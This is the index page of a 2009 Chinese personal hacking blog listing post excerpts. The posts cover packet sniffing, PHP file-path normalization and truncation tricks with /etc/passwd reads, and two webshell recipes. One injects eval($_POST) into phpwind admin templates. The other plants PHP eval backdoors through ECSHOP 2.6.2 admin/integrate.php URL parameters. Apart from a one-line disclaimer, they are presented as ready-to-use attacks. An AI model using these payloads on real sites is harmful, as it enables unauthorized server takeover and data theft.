显示下一条  |  关闭

飘的博客 ※飘§№

飘零的代码 http://piao2010.com

 
 
 
 

自定义模块

 
 
模块内容加载中...
 
 
 
 
 
 
 

博客搬家咯

2009-5-3 17:09:18 阅读278 评论0 32009/05 May3

欢迎访问我的新博客www.piao2010.com

作者  | 2009-5-3 17:09:18 | 阅读(278) |评论(0) | 阅读全文>>

从抓包到嗅探

2009-4-16 9:52:14 阅读332 评论0 162009/04 Apr16

 

文章来源:http://piao2010.com  性质:原创

此文是我的计算机网络课作业,拿出来凑凑数。

第一次接触“抓包”这个词应该是在高一的时候,当时刚刚迷上网络安全,经常从《黑客X档案》中看见一些利用抓包技术入侵的文章,最常用的工具就是WsockExpert,同时它也是我接触的第一个抓包工具。WsockExpert可以用来监视和截获指定进程网络数据的传输,修改网络发送和接收数据,并用NC(NetCa

作者  | 2009-4-16 9:52:14 | 阅读(332) |评论(0) | 阅读全文>>

php文件系统攻击向导

2009-4-12 15:47:55 阅读324 评论0 122009/04 Apr12

 

一.php文件系统路径正常化攻击

在路径中使用/和/.会使/etc/passwd/或者/etc/passwd/.作为一个文件被打开.

二.php文件系统过程路径截断攻击

PHP有一个路径截断的问题(一个非常邪恶的手段snprintf())只允许使用MAX_PATH被作为打开文件或者目录的鉴定.

三.php文件系统过程路径正常化攻击例子

$ php -r 'include("/etc/passwd");' | head -n1

root:x:0:0:root:/root:/bin/bash

一会我们应该知道某个路径正常化为标准

$ cat /etc//passwd | head -n1

作者  | 2009-4-12 15:47:55 | 阅读(324) |评论(0) | 阅读全文>>

phpwin后台拿shell的方法

2009-4-11 12:20:11 阅读230 评论0 112009/04 Apr11

方式1 模板法

进入后台, 风格模版设置 ,在随便一行写代码

记住,这代码必须顶着左边行写,代码前面不可以有任何字符。

EOT;

eval($a);

print <<

例如,我写完某一行为。

.headurl { color:#ffffff;}

EOT;

eval($_POST[’a’]);

print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}

而后得到一个shell

作者  | 2009-4-11 12:20:11 | 阅读(230) |评论(0) | 阅读全文>>

ECSHOP2.6.2后台拿WEBSHELL

2009-4-11 12:15:31 阅读375 评论0 112009/04 Apr11

请勿用于非法用途

利用方法:

http://www.xx. com/admin/integrate.php?act=sync&del_list=<?php%20eval($_POST[cmd])?>

htp://www.xx.  com/admin/integrate.php?act=sync&rename_list=<?php%20eval($_POST[cmd])?>

http://www.xx .com/admin/integrate.php?act=sync&ignore_list=<?php%20eval($_POST[cmd])?>

作者  | 2009-4-11 12:15:31 | 阅读(375) |评论(0) | 阅读全文>>

查看所有日志>>

 
 
 
 
 
 
 
 

浙江省 杭州市 金牛座

 发消息  写留言

 
http://piao2010.com Win,UNIX,Linux 玩黑就是玩个权限~! PHP,C,C++ 网络工程师 乐意结交喜欢网络安全的朋友o(∩_∩)o...※飘§№
 
博客等级加载中...
今日访问加载中...
总访问量加载中...
最后登录加载中...
 
 
 
 
 
 
 
心情随笔列表加载中...
 
 
 
 
 
 
 
模块内容加载中...
 
 
 
 
 
 我要留言
 
 
 
留言列表加载中...
 
 
 
 
 
 
 
列表加载中...
 
 
 
 
 

天气

 
 
模块内容加载中...
 
 
 
 
 

日历

 
 
模块内容加载中...
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2012

   
创建博客 登录  
 关注